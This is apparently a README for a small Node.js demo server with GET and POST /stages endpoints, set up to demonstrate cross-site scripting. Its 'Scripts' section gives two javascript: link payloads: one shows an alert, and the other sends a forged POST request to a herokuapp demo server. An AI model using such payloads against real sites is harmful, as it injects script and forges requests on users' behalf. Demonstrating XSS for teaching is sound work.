## About

Node.js server implementing two endpoints.

@GET /stages
Retrieves the list of stages

@POST /stages
Adds a new stage to the list

## Scripts

Example 1:
```
<a href="javascript: alert('XSS Demo!')">XSS attack example 1!</a>
```

Example 2:
```
<a href="javascript:var xhr = new XMLHttpRequest();
var payload=JSON.stringify({stage:'Malicious Data!'});
xhr.open('POST','https://gitlab-demo-server.herokuapp.com/stages',true);
xhr.setRequestHeader('Content-type','application/json');
xhr.send(payload);">XSS attack example 2!</a>
```

## How to

`yarn`

`node server`